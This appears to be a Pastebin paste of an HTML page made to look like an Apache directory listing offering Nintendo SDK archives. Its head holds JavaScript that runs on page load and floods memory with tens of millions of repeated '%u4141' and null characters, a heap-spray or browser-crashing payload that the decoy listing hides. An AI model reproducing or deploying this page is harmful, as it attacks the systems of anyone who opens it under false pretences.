Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
- <html>
- <head>
- <script type="text/javascript">
- var str = unescape("%u4141%u4141");
- var str2 = unescape("%u0000%u0000");
- var finalstr2 = mul8(str2, 49000000);
- var finalstr = mul8(str, 21000000);
- document.write(finalstr2);
- document.write(finalstr);
- function mul8 (str, num) {
- var i = Math.ceil(Math.log(num) / Math.LN2),
- res = str;
- do {
- res += res;
- } while (0 < --i);
- return res.slice(0, str.length * num);
- }
- </script>
- <title>Index of /</title>
- </head>
- <body>
- <h1>Index of /</h1>
- <pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icon$
- <img src="/icons/unknown.gif" alt="[ ]"> <a href="Ndevmenu_1.16.rar">Ndevmenu_1.16.rar</a> 31-Jan-2008 01:54 250K
- <img src="/icons/unknown.gif" alt="[ ]"> <a href="TwlightSDK-4_0.zip">TwlightSDK-4_0.zip</a> 21-Jan-2008 04:35 35M
- <img src="/icons/unknown.gif" alt="[ ]"> <a href="NitroSDK-3_1-060511a.zip">NitroSDK-3_1-060511a.zip</a> 12-Jan-2008 23:33 40M
- <img src="/icons/unknown.gif" alt="[ ]"> <a href="bootmii0.2b.tar.gz">bootmii0.2b.tar.gz</a> 16-Feb-2009 14:25 50k
- <hr></pre>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment